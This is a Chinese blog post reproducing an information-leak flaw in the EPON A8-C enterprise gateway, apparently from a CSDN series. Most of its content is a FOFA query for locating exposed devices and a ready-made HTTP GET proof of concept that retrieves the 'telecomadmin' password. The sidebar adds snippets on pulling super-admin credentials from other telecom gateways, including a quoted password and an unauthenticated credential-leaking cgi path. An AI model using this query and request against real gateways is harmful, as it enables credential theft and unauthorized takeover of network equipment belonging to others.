【漏洞复现】EPON上行A8-C政企网关信息泄露漏洞

最新推荐文章于 2024-07-30 10:39:03 发布
最新推荐文章于 2024-07-30 10:39:03 发布
阅读量960 收藏 5
点赞数 12
文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136035675
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

本文介绍了EPON上行A8-C政企网关的安全漏洞,该漏洞可能导致管理员密码被攻击者通过敏感信息泄露获取。文章详细阐述了漏洞描述,并提供了产品主页查询方式及漏洞复现的POC。最后,作者建议联系软件厂商修复此问题。
摘要由CSDN通过智能技术生成

Nx01 产品简介

        EPON上行A8-C政企网关是一款终端产品,提供企业网络解决方案。

Nx02 漏洞描述

        EPON上行A8-C政企网关敏感信息泄露漏洞,攻击者通过敏感信息泄露获取管理员密码。

Nx03 产品主页

fofa-query: "ZXECS" && title=="Web user login"

Nx04 漏洞复现

POC:

GET /user/local_user_mod.php?index_name=telecomadmin HTTP/1.1
Host: {
  {Hostname}}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
专栏目录

已下架不支持订阅

漏洞复现EPON上行A8-C政企网关未授权下载漏洞
晚风不及你
02-05 852
EPON上行A8-C政企网关是一款终端产品,提供企业网络解决方案。
致远OA A8 status.jsp 信息泄露POC批量验证
布啦啦
03-22 1066
漏洞名称:致远OA A8 status.jsp 信息泄露
HW漏洞威胁情报第六天|HW情报
最新发布
weixin_43167326的博客
07-30 414
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
致远A8+数据库账密信息泄露
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
08-04 1634
致远A8+是中国致远信息技术股份有限公司(Inspur)开发的一款企业级服务器产品。作为致远公司的旗舰机型,A8+可提供高性能、可靠性和可扩展性,适用于各种企业级应用和数据中心环境。致远A8+全版本存在数据库账号密码读取漏洞。致远A8+(V7.0) SP1-SP3。
光猫超级管理员账号密码和Telnet登陆
热门推荐
生活在别处
01-18 15万+
如果光猫是运行在路由器模式下,那么,内部路由器就肯定无法获取公网地址。这种情况肯定需要把光猫改为桥接模式,才有可能使得内部路由器获得公网地址。光猫在桥接模式下,会单纯负责将光信号转换为电信号。其余工作,包括拨号上网等都会交给内部路由器来执行。光猫在路由器模式下,除了将光信号转换为电信号外,还会负责拨号上网、DHCP、Wifi广播等工作。光猫改为桥接模式,也不一定可以使得内部路由器获得公网地址。近年来的光猫都是设置了动态超级管理员密码,需要先将光猫初始化后,才能恢复默认的超级管理员密码。
【已解决】天翼电信宽带改桥模式,使用路由器ppoe拨号
月球挖掘机
07-19 2万+
本教程将讲解如何将电信光猫宽带设置为桥模式,从而实现通过路由器拨号上网。
天翼宽带政企网关A8-CFTTO安装教程.docx
10-07
天翼宽带政企网关 A8-C(FTTO) 安装教程 一、登录界面介绍 在安装天翼宽带政企网关 A8-C(FTTO) 设备时,需要先在电脑上设置好 IP 地址和子网掩码,然后连接到设备的内网口,打开网页输入地址 192.168.1.1,回车,...
EPON命令行手册-V1.1.pdf
02-16
根据给定文件的内容,我们可以提炼出一系列与康特OLT(EPON)相关的配置和管理知识点。这些知识点涵盖了命令行手册的多个方面,包括设备连接、命令行基础、系统命令、板卡配置、配置文件、升级配置和告警配置等。 ...
HW漏洞威胁情报第一天|HW情报
weixin_43167326的博客
07-24 421
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!蓝凌EKP存在sys_ui_component远程命令执行漏洞亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞
电信密码转换
12-12
电信宽带密码转换器,用于路由器共享,轻松实现wifi
天翼宽带政企网关B2-1P 如何获得超级管理员账号?
09-28 2660
RT 用useradmin没办法做NAT,想进telecomadmin里面看看,,,,,并且已经使用过nE7jA%5m这个密码登录,没有用! 求办法!!! 最佳答案   查找超级管理员密码方法:  1、用光猫背后的useradmin 帐号和密码登录 192.168.1.12  2、下载http://192.168.1.1/backupse...
wo-27s管理员账户和密码_获取电信天翼网关超级密码,修改路由模式为桥接模式...
weixin_39931923的博客
10-21 1万+
概述现在家庭安装的宽带基本上都是光纤入户了,极大的提升了上网的速度,光猫是将光纤中的光信号转换成电信号,光纤口转换成网口的必备入网设备,相信有不少的网络爱好者喜欢自己独立研究,但是电信配的光猫大多是只给了我们普通的账号,并没有给管理账号。然而,想要自己去设置光猫是需要超级管理账号密码的,这里就给大家讲一下如何用简单的方法获取到电信光猫天翼网关的超级密码,并将默认的路由模式修改为桥接模式。操作步骤1...
太恐怖了!黑客正在GPON路由器中利用新的零日漏洞
w3cschools的博客
05-24 2572
  即使在意识到针对GPONWi-Fi路由器的各种主动网络攻击之后,如果您还没有将其从互联网上带走,那么请小心,因为一个新的僵尸网络已加入GPON组织,该组织正在利用未公开的零日漏洞(零时差攻击)。  来自国内知名黑客安全组织东方联盟的安全研究人员警告说,至少有一家僵尸网络运营商利用由韩国DASANZhoneSolutions公司制造的支持千兆比特无源光网络(GPON)路由器的新零日漏洞。  这个...
致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 6736
致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现
致远a8 java_致远A8任意文件写入漏洞_getshell_exp
weixin_42311000的博客
02-13 1604
1 #coding=utf-82 importsys3 importrequests45 defencode(origin_bytes):6 """7 重构 base64 编码函数8 """9 #将每一位bytes转换为二进制字符串10 base64_charset = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05...
一次对天翼安全网关的渗透
zhangge3663的博客
01-29 4890
起因 听大师傅说天翼安全网关可以telnet登录,回去尝试了一下发现并没有开放telnet端口,把目标转向如何开启,经过一系列搜索,最后拿下网关 信息泄露 我家这个网关型号是HG261GS,经过一番搜索,发现访问http://192.168.1.1/cgi-bin/baseinfoSet.cgi可以拿到密码 然后搜索密码的加密方式,得到工程账号的密码,加密算法为加密算法: 字母转换为其ASCII码+4,数字直接就是ASCII码。 之后登陆 命令执行 在后台转了一圈没发现开启tel.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值